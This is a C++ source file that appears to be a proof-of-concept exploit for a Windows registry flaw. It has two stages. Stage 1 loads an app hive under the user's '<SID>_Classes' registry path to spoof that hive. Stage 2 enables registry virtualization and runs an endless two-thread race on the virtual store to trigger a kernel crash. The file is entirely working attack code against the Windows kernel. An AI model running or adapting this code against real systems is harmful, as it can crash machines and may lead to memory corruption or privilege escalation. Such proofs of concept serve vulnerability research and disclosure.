#define _CRT_SECURE_NO_WARNINGS
#define WIN32_NO_STATUS
#include <Windows.h>
#undef WIN32_NO_STATUS
#include <winternl.h>
#include <ntstatus.h>
#include <sddl.h>

#include <cstdio>

#pragma comment(lib, "ntdll")

typedef struct _RTL_RELATIVE_NAME {
  UNICODE_STRING RelativeName;
  HANDLE         ContainingDirectory;
  void* CurDirRef;
} RTL_RELATIVE_NAME, * PRTL_RELATIVE_NAME;

extern "C" {

NTSTATUS NTAPI NtLoadKeyEx(
  POBJECT_ATTRIBUTES   DestinationKeyName,
  POBJECT_ATTRIBUTES   HiveFileName,
  ULONG                Flags,
  HANDLE               TrustClassKey,
  PHANDLE              EventHandle,
  ACCESS_MASK          DesiredAccess,
  PHANDLE              KeyHandle,
  ULONG                Reserved
);

BOOLEAN NTAPI RtlDosPathNameToRelativeNtPathName_U(
  PCWSTR DosFileName,
  PUNICODE_STRING NtFileName,
  PWSTR* FilePath,
  PRTL_RELATIVE_NAME RelativeName
);

NTSTATUS NTAPI RtlInitUnicodeStringEx(
  PUNICODE_STRING Destination,
  PCWSTR          Source
);

NTSTATUS NTAPI RtlAppendUnicodeToString(
  PUNICODE_STRING Destination,
  PCWSTR          Source
);

}  // extern "C"

BOOL EnableTokenVirtualization(HANDLE hToken, BOOL bEnabled) {
  DWORD dwVirtualizationEnabled = bEnabled;
  if (!SetTokenInformation(hToken,
                           TokenVirtualizationEnabled,
                           &dwVirtualizationEnabled,
                           sizeof(dwVirtualizationEnabled))) {
    printf("SetTokenInformation failed with error %u\n", GetLastError());
    return FALSE;
  }

  return TRUE;
}

BOOL LoadHiveUnderPath(LPCWSTR HivePath,
                       LPCWSTR RegistryPath,
                       ULONG Flags,
                       HKEY htrustkey,
                       PHKEY hkey) {

  UNICODE_STRING HivePathString;
  NTSTATUS Status = RtlInitUnicodeStringEx(&HivePathString, HivePath);
  if (!NT_SUCCESS(Status)) {
    printf("RtlInitUnicodeStringEx failed with error %x\n", Status);
    return FALSE;
  }

  UNICODE_STRING NtHivePath;
  RTL_RELATIVE_NAME RelativeName;
  if (!RtlDosPathNameToRelativeNtPathName_U(HivePathString.Buffer, &NtHivePath, NULL, &RelativeName)) {
    printf("RtlDosPathNameToRelativeNtPathName_U failed\n");
    return FALSE;
  }

  UNICODE_STRING RegistryPathString;
  RtlInitUnicodeString(&RegistryPathString, RegistryPath);

  OBJECT_ATTRIBUTES DestinationKeyName, HiveFileName;
  InitializeObjectAttributes(&DestinationKeyName, &RegistryPathString, 0, NULL, NULL);
  InitializeObjectAttributes(&HiveFileName, &NtHivePath, 0, NULL, NULL);

  Status = NtLoadKeyEx(&DestinationKeyName,
                       &HiveFileName,
                       Flags,
                       htrustkey,
                       NULL,
                       GENERIC_ALL,
                       (PHANDLE)hkey,
                       0);

  if (!NT_SUCCESS(Status)) {
    printf("NtLoadKeyEx failed with error %x\n", Status);
    return FALSE;
  }

  return TRUE;
}

INT Stage1(LPCWSTR HivePath) {
  LONG st;

  //
  // Build the \Registry\A\<SID>_Classes path for the current user.
  //

  HANDLE hToken;
  if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken)) {
    printf("OpenProcessToken failed with error %u\n", GetLastError());
    return 1;
  }

  DWORD UserInfoLength;
  if (GetTokenInformation(hToken, TokenUser, NULL, 0, &UserInfoLength) ||
    GetLastError() != ERROR_INSUFFICIENT_BUFFER) {
    printf("GetTokenInformation failed with error %u\n", GetLastError());
    return 1;
  }

  TOKEN_USER* UserInfo = (TOKEN_USER*)malloc(UserInfoLength);

  if (!GetTokenInformation(hToken, TokenUser, UserInfo, UserInfoLength, &UserInfoLength)) {
    printf("GetTokenInformation failed with error %u\n", GetLastError());
    return 1;
  }

  LPWSTR StringSid;
  if (!ConvertSidToStringSidW(UserInfo->User.Sid, &StringSid)) {
    printf("ConvertSidToStringSidA failed with error %u\n", GetLastError());
    return 1;
  }

  CONST SIZE_T RegistryPathLength = (wcslen(StringSid) + 21) * sizeof(WCHAR);
  PWSTR RegistryPathBuffer = (PWSTR)malloc(RegistryPathLength);

  if (RegistryPathBuffer == NULL) {
    printf("Failed to allocate registry path buffer\n");
    return 1;
  }

  RegistryPathBuffer[0] = L'\0';
  wcscat(RegistryPathBuffer, L"\\Registry\\A\\");
  wcscat(RegistryPathBuffer, StringSid);
  wcscat(RegistryPathBuffer, L"_Classes");

  //
  // Load the app hive with a key inside HKCU as the trust class key.
  //

  HKEY hkcu;
  st = RegOpenKeyExW(HKEY_CURRENT_USER, L"Software", 0, KEY_ALL_ACCESS, &hkcu);

  if (st != ERROR_SUCCESS) {
    printf("RegOpenKeyExA failed with error %d\n", st);
    return 1;
  }

  HKEY happkey;
  if (!LoadHiveUnderPath(HivePath,
                         RegistryPathBuffer,
                         REG_APP_HIVE | REG_LOAD_HIVE_OPEN_HANDLE,
                         hkcu,
                         &happkey)) {
    return 1;
  }

  return 0;
}

DWORD WINAPI Stage2_ThreadProc(LPVOID lpParameter) {

  //
  // Pre-create the virtual store base key.
  //

  HKEY hvirtstore;
  LONG st = RegCreateKeyExW(HKEY_CURRENT_USER,
                            L"Software\\Classes\\VirtualStore",
                            0,
                            NULL,
                            REG_OPTION_VOLATILE,
                            KEY_ALL_ACCESS,
                            NULL,
                            &hvirtstore,
                            NULL);

  if (st != ERROR_SUCCESS) {
    printf("RegCreateKeyExW failed with error %d\n", st);
    ExitProcess(1);
  }

  //
  // Indefinitely create the Machine\Software\Test key structure under the
  // virtual store and delete it, to race with the second thread that accesses
  // the same hive via registry virtualization.
  //

  while (1) {
    HKEY hkey;
    RegCreateKeyExW(hvirtstore,
                    L"Machine\\Software\\Test",
                    0,
                    NULL,
                    REG_OPTION_VOLATILE,
                    KEY_ALL_ACCESS,
                    NULL,
                    &hkey,
                    NULL);

    RegDeleteTreeW(hvirtstore, L"Machine");
  }

  return 0;
}

int Stage2() {

  //
  // Enable virtualization for our process.
  //

  HANDLE hToken;
  if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken)) {
    printf("OpenProcessToken failed with error %u\n", GetLastError());
    return 1;
  }

  EnableTokenVirtualization(hToken, TRUE);

  //
  // Create the concurrent thread that repeatedly creates and deletes keys in
  // the virtual store.
  //

  CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Stage2_ThreadProc, NULL, 0, NULL);

  //
  // Indefinitely trigger registry virtualization, which translates the HKLM
  // path to a virtualized one and tries to traverse it in the
  // HKCU\Software\Classes hive. However since the app hive is wrongly locked
  // instead of the UsrClass.dat hive, we run into a race condition when
  // accessing the key nodes, and should eventually crash.
  //

  while (1) {
    HKEY hkey;
    RegCreateKeyExW(HKEY_LOCAL_MACHINE,
                    L"Software\\Test",
                    0,
                    NULL,
                    REG_OPTION_VOLATILE,
                    KEY_ALL_ACCESS,
                    NULL,
                    &hkey,
                    NULL);
  }
}

int wmain(int argc, wchar_t** argv) {
  int ret = 0;

  if (argc != 3) {
    wprintf(L"Usage: %s <stage 1/2> <hive file>\n", argv[0]);
    return 1;
  }

  CONST INT Stage = _wtoi(argv[1]);
  LPCWSTR HivePath = argv[2];

  if (Stage == 1) {
    ret = Stage1(HivePath);

    if (ret == 0) {
      printf("App hive loaded under the <SID>_Classes path. "
             "Log out and back in for the spoofed entry to take effect.");
    }
  } else if (Stage == 2) {
    ret = Stage2();
  }

  return ret;
}
